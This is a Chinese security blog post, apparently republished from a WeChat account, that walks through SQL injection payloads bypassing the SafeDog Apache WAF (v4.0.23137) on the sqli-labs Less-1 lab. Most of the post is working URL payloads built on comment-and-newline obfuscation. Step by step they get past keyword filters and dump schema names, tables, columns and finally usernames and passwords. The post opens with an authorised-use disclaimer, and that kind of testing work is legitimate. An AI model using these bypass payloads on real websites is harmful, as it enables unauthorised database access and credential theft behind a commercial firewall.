Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【Bypass】安全狗apache V4.0.23137 SQL注入绕过

【Bypass】安全狗apache V4.0.23137 SQL注入绕过

作者头像
乌鸦安全
发布于 2022-04-15 00:58:30
发布于 2022-04-15 00:58:30
97100
代码可运行
举报
文章被收录于专栏:乌鸦安全乌鸦安全
运行总次数:0
代码可运行

✎ 阅读须知

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

更新时间:2021.10.21

1. 版本

当前版本是最新版安全狗 主程序版本号为:v4.0.23137

上一次的版本为 主程序版本号为:v4.0.26655

所以这次已经对安全狗进行了升级。

2. 开始绕

按照ling老板的笔记,继续:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
关键:/*//------/*/
安全狗 order by 绕过id=1%27%20order%20/*//------/*/--+%20%0Aby%203--+s
精简版:id=1%27%20order%20/*//--/*/by%203--+
过union select -1%27%20union%20/*//--/*/select%201,2,3--+
过关键字database:d=-1%27%20union%20/*//--/*/select%201,database/*//--/*/(),3--+

测试:http://127.0.0.1/sqli/Less-1/?id=-1'union%20/*//--/*/select%201,2,concat(schema_name) from /*/--/information_/schema.--/*/schemata--+*/%23
http://10.0.66.157/sqli/Less-1/?id=-1'union%20/*//--/*/select%201,2,concat(username) from /*/--/information_/schema.--/*/users--+*/%23
http://10.0.66.157/sqli/Less-1/?id=-1'union%20/*//--/*/select%201,2,concat(username) from /*/--/*/users--+*/%23


单独的from 不拦截 schema.schemata也不拦截, information_schema拦截,from information拦截,from/*//--/*/information不拦截



查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema='security'
查字段:select column_name from information_schema.columns where table_name='users'
查字段的值:select username,password from security.users

ling老板口算一个字符,非常重要%20/*//--/*/接下来的操作都是在此基础上实现的。

2.1 order by 语句

http://192.168.127.131/sqli/Less-1/?id=1' order by 1 --+ 拦截

http://192.168.127.131/sqli/Less-1/?id=1' order /*//--/*/ by 121 --+ bypass成功

2.2 union select语句

http://192.168.127.131/sqli/Less-1/?id=1' union /*//--/*/ select 1,2, 3 --+ 绕过

http://192.168.127.131/sqli/Less-1/?id=1' union /*//--/*/ /*!--+/*%0aselect/*!1,2,3*/ --+ 同样可以绕过

2.3 database()关键字

http://192.168.127.131/sqli/Less-1/?id=1' union /*//--/*/ select 1,2, database() --+ 拦截

http://192.168.127.131/sqli/Less-1/?id=-1' union /*//--/*/ /*!--+/*%0aselect/*!1,2,*/database /*//--/*/ () --+ 正常

image.png

2.4 获取其他的库

http://192.168.127.131/sqli/Less-1/?id=-1' union /*//--/*/ select 1,2, group_concat(schema_name) from information_schema.schemata --+拦截

这里经过多次fuzz,后来发现狗狗对information_schema.schemata 拦截比较厉害,

http://192.168.127.131/sqli/Less-1/?id=-1' union /*//--/*/ select 1,2, group_concat(schema_name) from information_schema. /*//--/*/ schemata --+ 还是被拦截

那在这里还是无法绕过,在这里就使用以前的一个%0a试试

/*!06447%23%0afrom*/

因此在这里可以使用

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://192.168.127.131/sqli/Less-1/?id=-1'   union   /*//--/*/ select 1,2, group_concat(schema_name)    /*!from*/    /*!--+/*%0ainformation_schema./*!schemata*/ --+

当然,在上次发的教程中,上面的那个被拦截了,但是在这更新之后,并未进行拦截,所以以前的方法在这里也可以使用union select 1,2,3 转换为: union /*!--+/*%0aselect/*!1,2,*/3

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://192.168.127.131/sqli/Less-1/?id=-1'   union   /*!--+/*%0aselect/*!1,2,*/  group_concat(schema_name)    /*!from*/    /*!--+/*%0ainformation_schema./*!schemata*/ --+

2.5 一次性获取所有的表

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://192.168.127.131/sqli/Less-1/?id=-1'   union /*!--+/*%0aselect/*!1,2,*/  group_concat(table_name)    /*!from*/     /*!--+/*%0ainformation_schema./*!tables*/ where table_schema='security' --+

2.6 一次性获取所有的字段

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://192.168.127.131/sqli/Less-1/?id=-1'  union /*!--+/*%0aselect/*!1,2,*/  group_concat(column_name)    /*!from*/     /*!--+/*%0ainformation_schema./*!columns*/ where table_name='users' --+

2.7 一次性获取字段里面的值

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://192.168.127.131/sqli/Less-1/?id=-1'  union /*!--+/*%0aselect/*!1,2,*/  group_concat(concat_ws(0x7e,username, password))     /*!from*/    security.users --+

3. 总结

这个和上次的绕过相比较,更加简单了,万能的绕过方法依旧可以使用 这里比较重要的点:

万能符号:union select --> union/*//--/*/select

union select 1,2,3 --> union /*!--+/*%0aselect/*!1,2,*/ 3

不过从版本上看,好像还是没变的

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-03-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 乌鸦安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【less-1】基于SQLI的SQL字符型报错注入
通过本实验理解数字型报错SQL注入漏洞点的定位方法,掌握利用手工方式完成一次完整SQL注入的过程,熟悉常见SQL注入命令的操作。
未名编程
2024/10/12
1240
【less-1】基于SQLI的SQL字符型报错注入
绕过安全狗进行sql注入(MySQL)
前几天渗透了一个站,由于没有做好善后工作被管理员发现了,再次访问那个站的时候,管理员已经删了大马,装上了网站安全狗(我估计大马应该是安全狗删除的,毕竟那个管理员真的太懒了,我的小马还在,并且居然菜刀还可以连接),为了给这个管理员增强点安全防护意识,我就开始研究起了安全狗的绕过。
tnt阿信
2020/08/05
2.1K0
绕过安全狗进行sql注入(MySQL)
SQL注入-安全狗apache最新版绕过
现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。
乌鸦安全
2021/08/05
1.9K0
SQL注入-安全狗apache最新版绕过
SQLi_Labs通关文档【1-65关】
为了不干扰自己本机环境,sql-lab我就用的docker跑起来的,搭建也非常简单,也就两条命令
HACK学习
2019/08/05
4K1
1.1.1-SQL注入-SQL注入基础-SQL手工注入方法
核心原理: MySql内置的infromation_schema库,它功能强大,是我们进行MySql注入的基石!
tea9
2022/07/16
1.8K0
1.1.1-SQL注入-SQL注入基础-SQL手工注入方法
SQL注入 安全狗apache3.5.12048版本绕过
没错,这次我们又来了,还是那条狗,绕过的是安全狗apache3.5.12048版本,个人感觉这个狗比上次的那个有难度些。上次发的文章里面没安全狗的文件,因为当时安装之后文件就删了,这次有,后台回复关键字:
乌鸦安全
2021/08/05
5620
SQL注入 安全狗apache3.5.12048版本绕过
WEB安全基础 - - -SQL注入利用
 报错为:Unknown column '5' in 'order clause' 
干掉芹菜
2022/11/19
5210
WEB安全基础 - - -SQL注入利用
sqli-labs通关笔记(1-30)
sqli-labs是一款练习sql注入的著名靶场。而造成SQL注入的原因是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为 称为SQL注入。通过本文将sqli-la
逍遥子大表哥
2022/04/15
2.2K0
sqli-labs通关笔记(1-30)
1.2.1-SQL注入-SQL注入语法类型-union联合查询注入
SQL UNION 操作符 用于合并两个或多个SELECT语句的结果集。 注意: SELECT语句必须拥有相同数量的列。 列也必须拥有相似的数据类型。 每条SELECT语句中列的顺序必须相同。
tea9
2022/07/16
9420
SQL注入 安全狗apache4.0.26655绕过
本次靶场采用经典的sqli-labs搭建,waf使用的是安全狗的apache4.0.26655版本,文章从最开始的分析到最后的结果,中间难免会有错误的地方,希望大家多多包涵和理解。
乌鸦安全
2021/08/05
8160
SQL注入 安全狗apache4.0.26655绕过
SQL注入原理剖析
SQL注入原理剖析 SQL注入流程 SQL注入流程: 1、判断是否有注入(判断是否为严格校验) 2、什么类型的SQL注入 3、语句是否能够被恶意修改 4、是否能够成功被带入执行 5、获取我们想要的数据
渗透攻击红队
2019/11/19
9810
一篇文章带你进入Bypass 技术大门!
其实我们过这些waf就是个正则的绕过,因为这种通用型的waf,需要考虑到用户体验,他不能出现什么东西就直接拦截,比正则过滤的一些好绕一点,如何成功绕过我们需要具备对mysql各个函数、语法、特性的熟悉,然后通过不断的fuzz来测试出我们想要的payload的
安全小王子
2020/11/11
4720
SQL注入绕过(第二弹)
1.还是找规律 order不拦截,orderby组合在一起就会被拦截。这里我正好想到上次bypass一个报错注入的手法,就是一个简单的换行,这里要是不懂。可以去学下数据库噻
Power7089
2020/07/27
6620
SQL注入绕过(第二弹)
新手科普 | MySQL手工注入之基本注入流程
MySQL手工注入的基本步骤以及一些技巧的记录,当出现学习手工注入的时候,网上的文章参差不齐,导致很长一段时间对手工注入的理解一直处于一知半解的状态,特此记录本文,让小白们少走些弯路。本文只针对手工注入小白,大牛绕过轻喷。
HACK学习
2019/08/07
1.6K0
新手科普 | MySQL手工注入之基本注入流程
sql注入入门学习(数字型)(连载中)
在MySQL中,表名存放在information_schema数据库下tables表table_name字段中、查表名我们主要用到的是TABLES表
一个淡定的打工菜鸟
2018/12/07
1.2K0
Sqli_labs65关通关详解(上)
Less-1 这个题目是基于错误,单引号,字符型注入, http://127.0.0.1/sqli/Less-1/?id=1' //报错 http://127.0.0.1/sqli/Less-
安恒网络空间安全讲武堂
2018/02/06
1.8K0
Sqli_labs65关通关详解(上)
sqli通关笔记(1)
本次教程来自YanXia,转载请注明作者信息,博客地址http://www.535yx.cn,感谢
YanXia
2023/04/07
1700
sqli通关笔记(1)
从SQL注入绕过最新安全狗WAF中学习fuzz
SQL注入并不是很精通,通过实战绕过WAF来进行加强SQL注入能力,希望对正在学习的师傅能有一丝帮助。
用户9691112
2023/05/18
7090
从SQL注入绕过最新安全狗WAF中学习fuzz
Pentester之SQL过关纪实
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术,如:XSS跨站脚本攻击、SQL注入、目录遍历、命令注入、代码注入 、XML攻击、LDAP攻击、文件上传。靶场介绍可以查看官方网站[1]靶场环境搭建方法可以参考文章[2],先从SQL注入顺手练练
网络安全自修室
2020/08/21
5380
Pentester之SQL过关纪实
SQL注入之联合查询注入
在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位
全栈程序员站长
2022/08/31
1.3K0
相关推荐
【less-1】基于SQLI的SQL字符型报错注入
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验